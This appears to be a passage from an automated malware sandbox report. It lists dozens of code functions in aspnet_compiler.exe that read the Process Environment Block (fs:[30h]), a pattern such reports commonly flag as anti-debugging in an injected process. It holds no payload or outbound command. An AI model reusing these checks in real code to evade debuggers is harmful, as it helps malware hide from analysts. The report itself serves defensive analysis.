            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B760B8 mov eax, dword ptr fs:[00000030h]3_2_01B760B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B760B8 mov ecx, dword ptr fs:[00000030h]3_2_01B760B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B480A8 mov eax, dword ptr fs:[00000030h]3_2_01B480A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB208A mov eax, dword ptr fs:[00000030h]3_2_01AB208A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB80E9 mov eax, dword ptr fs:[00000030h]3_2_01AB80E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAA0E3 mov ecx, dword ptr fs:[00000030h]3_2_01AAA0E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B360E0 mov eax, dword ptr fs:[00000030h]3_2_01B360E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAC0F0 mov eax, dword ptr fs:[00000030h]3_2_01AAC0F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF20F0 mov ecx, dword ptr fs:[00000030h]3_2_01AF20F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B320DE mov eax, dword ptr fs:[00000030h]3_2_01B320DE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B46030 mov eax, dword ptr fs:[00000030h]3_2_01B46030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAA020 mov eax, dword ptr fs:[00000030h]3_2_01AAA020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAC020 mov eax, dword ptr fs:[00000030h]3_2_01AAC020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B34000 mov ecx, dword ptr fs:[00000030h]3_2_01B34000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACE016 mov eax, dword ptr fs:[00000030h]3_2_01ACE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACE016 mov eax, dword ptr fs:[00000030h]3_2_01ACE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACE016 mov eax, dword ptr fs:[00000030h]3_2_01ACE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACE016 mov eax, dword ptr fs:[00000030h]3_2_01ACE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADC073 mov eax, dword ptr fs:[00000030h]3_2_01ADC073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B36050 mov eax, dword ptr fs:[00000030h]3_2_01B36050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB2050 mov eax, dword ptr fs:[00000030h]3_2_01AB2050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAE388 mov eax, dword ptr fs:[00000030h]3_2_01AAE388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAE388 mov eax, dword ptr fs:[00000030h]3_2_01AAE388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAE388 mov eax, dword ptr fs:[00000030h]3_2_01AAE388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD438F mov eax, dword ptr fs:[00000030h]3_2_01AD438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD438F mov eax, dword ptr fs:[00000030h]3_2_01AD438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AA8397 mov eax, dword ptr fs:[00000030h]3_2_01AA8397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AA8397 mov eax, dword ptr fs:[00000030h]3_2_01AA8397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AA8397 mov eax, dword ptr fs:[00000030h]3_2_01AA8397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE63FF mov eax, dword ptr fs:[00000030h]3_2_01AE63FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACE3F0 mov eax, dword ptr fs:[00000030h]3_2_01ACE3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACE3F0 mov eax, dword ptr fs:[00000030h]3_2_01ACE3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACE3F0 mov eax, dword ptr fs:[00000030h]3_2_01ACE3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B543D4 mov eax, dword ptr fs:[00000030h]3_2_01B543D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B543D4 mov eax, dword ptr fs:[00000030h]3_2_01B543D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA3C0 mov eax, dword ptr fs:[00000030h]3_2_01ABA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA3C0 mov eax, dword ptr fs:[00000030h]3_2_01ABA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA3C0 mov eax, dword ptr fs:[00000030h]3_2_01ABA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA3C0 mov eax, dword ptr fs:[00000030h]3_2_01ABA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA3C0 mov eax, dword ptr fs:[00000030h]3_2_01ABA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA3C0 mov eax, dword ptr fs:[00000030h]3_2_01ABA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB83C0 mov eax, dword ptr fs:[00000030h]3_2_01AB83C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB83C0 mov eax, dword ptr fs:[00000030h]3_2_01AB83C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB83C0 mov eax, dword ptr fs:[00000030h]3_2_01AB83C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB83C0 mov eax, dword ptr fs:[00000030h]3_2_01AB83C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E3DB mov eax, dword ptr fs:[00000030h]3_2_01B5E3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E3DB mov eax, dword ptr fs:[00000030h]3_2_01B5E3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E3DB mov ecx, dword ptr fs:[00000030h]3_2_01B5E3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E3DB mov eax, dword ptr fs:[00000030h]3_2_01B5E3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B363C0 mov eax, dword ptr fs:[00000030h]3_2_01B363C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B6C3CD mov eax, dword ptr fs:[00000030h]3_2_01B6C3CD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B88324 mov eax, dword ptr fs:[00000030h]3_2_01B88324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B88324 mov ecx, dword ptr fs:[00000030h]3_2_01B88324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B88324 mov eax, dword ptr fs:[00000030h]3_2_01B88324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B88324 mov eax, dword ptr fs:[00000030h]3_2_01B88324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEA30B mov eax, dword ptr fs:[00000030h]3_2_01AEA30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEA30B mov eax, dword ptr fs:[00000030h]3_2_01AEA30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEA30B mov eax, dword ptr fs:[00000030h]3_2_01AEA30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAC310 mov ecx, dword ptr fs:[00000030h]3_2_01AAC310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD0310 mov ecx, dword ptr fs:[00000030h]3_2_01AD0310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5437C mov eax, dword ptr fs:[00000030h]3_2_01B5437C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7A352 mov eax, dword ptr fs:[00000030h]3_2_01B7A352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B58350 mov ecx, dword ptr fs:[00000030h]3_2_01B58350
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3035C mov eax, dword ptr fs:[00000030h]3_2_01B3035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3035C mov eax, dword ptr fs:[00000030h]3_2_01B3035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3035C mov eax, dword ptr fs:[00000030h]3_2_01B3035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3035C mov ecx, dword ptr fs:[00000030h]3_2_01B3035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3035C mov eax, dword ptr fs:[00000030h]3_2_01B3035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3035C mov eax, dword ptr fs:[00000030h]3_2_01B3035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B8634F mov eax, dword ptr fs:[00000030h]3_2_01B8634F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC02A0 mov eax, dword ptr fs:[00000030h]3_2_01AC02A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC02A0 mov eax, dword ptr fs:[00000030h]3_2_01AC02A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B462A0 mov eax, dword ptr fs:[00000030h]3_2_01B462A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B462A0 mov ecx, dword ptr fs:[00000030h]3_2_01B462A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B462A0 mov eax, dword ptr fs:[00000030h]3_2_01B462A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B462A0 mov eax, dword ptr fs:[00000030h]3_2_01B462A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B462A0 mov eax, dword ptr fs:[00000030h]3_2_01B462A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B462A0 mov eax, dword ptr fs:[00000030h]3_2_01B462A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEE284 mov eax, dword ptr fs:[00000030h]3_2_01AEE284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEE284 mov eax, dword ptr fs:[00000030h]3_2_01AEE284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B30283 mov eax, dword ptr fs:[00000030h]3_2_01B30283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B30283 mov eax, dword ptr fs:[00000030h]3_2_01B30283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B30283 mov eax, dword ptr fs:[00000030h]3_2_01B30283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC02E1 mov eax, dword ptr fs:[00000030h]3_2_01AC02E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC02E1 mov eax, dword ptr fs:[00000030h]3_2_01AC02E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC02E1 mov eax, dword ptr fs:[00000030h]3_2_01AC02E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA2C3 mov eax, dword ptr fs:[00000030h]3_2_01ABA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA2C3 mov eax, dword ptr fs:[00000030h]3_2_01ABA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA2C3 mov eax, dword ptr fs:[00000030h]3_2_01ABA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA2C3 mov eax, dword ptr fs:[00000030h]3_2_01ABA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA2C3 mov eax, dword ptr fs:[00000030h]3_2_01ABA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B862D6 mov eax, dword ptr fs:[00000030h]3_2_01B862D6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AA823B mov eax, dword ptr fs:[00000030h]3_2_01AA823B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AA826B mov eax, dword ptr fs:[00000030h]3_2_01AA826B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB4260 mov eax, dword ptr fs:[00000030h]3_2_01AB4260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB4260 mov eax, dword ptr fs:[00000030h]3_2_01AB4260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB4260 mov eax, dword ptr fs:[00000030h]3_2_01AB4260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B8625D mov eax, dword ptr fs:[00000030h]3_2_01B8625D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B6A250 mov eax, dword ptr fs:[00000030h]3_2_01B6A250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B6A250 mov eax, dword ptr fs:[00000030h]3_2_01B6A250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B38243 mov eax, dword ptr fs:[00000030h]3_2_01B38243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B38243 mov ecx, dword ptr fs:[00000030h]3_2_01B38243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB6259 mov eax, dword ptr fs:[00000030h]3_2_01AB6259
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAA250 mov eax, dword ptr fs:[00000030h]3_2_01AAA250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B305A7 mov eax, dword ptr fs:[00000030h]3_2_01B305A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B305A7 mov eax, dword ptr fs:[00000030h]3_2_01B305A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B305A7 mov eax, dword ptr fs:[00000030h]3_2_01B305A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD45B1 mov eax, dword ptr fs:[00000030h]3_2_01AD45B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD45B1 mov eax, dword ptr fs:[00000030h]3_2_01AD45B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE4588 mov eax, dword ptr fs:[00000030h]3_2_01AE4588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB2582 mov eax, dword ptr fs:[00000030h]3_2_01AB2582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB2582 mov ecx, dword ptr fs:[00000030h]3_2_01AB2582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEE59C mov eax, dword ptr fs:[00000030h]3_2_01AEE59C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEC5ED mov eax, dword ptr fs:[00000030h]3_2_01AEC5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEC5ED mov eax, dword ptr fs:[00000030h]3_2_01AEC5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]3_2_01ADE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]3_2_01ADE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]3_2_01ADE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]3_2_01ADE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]3_2_01ADE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]3_2_01ADE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]3_2_01ADE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]3_2_01ADE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB25E0 mov eax, dword ptr fs:[00000030h]3_2_01AB25E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEE5CF mov eax, dword ptr fs:[00000030h]3_2_01AEE5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEE5CF mov eax, dword ptr fs:[00000030h]3_2_01AEE5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB65D0 mov eax, dword ptr fs:[00000030h]3_2_01AB65D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEA5D0 mov eax, dword ptr fs:[00000030h]3_2_01AEA5D0
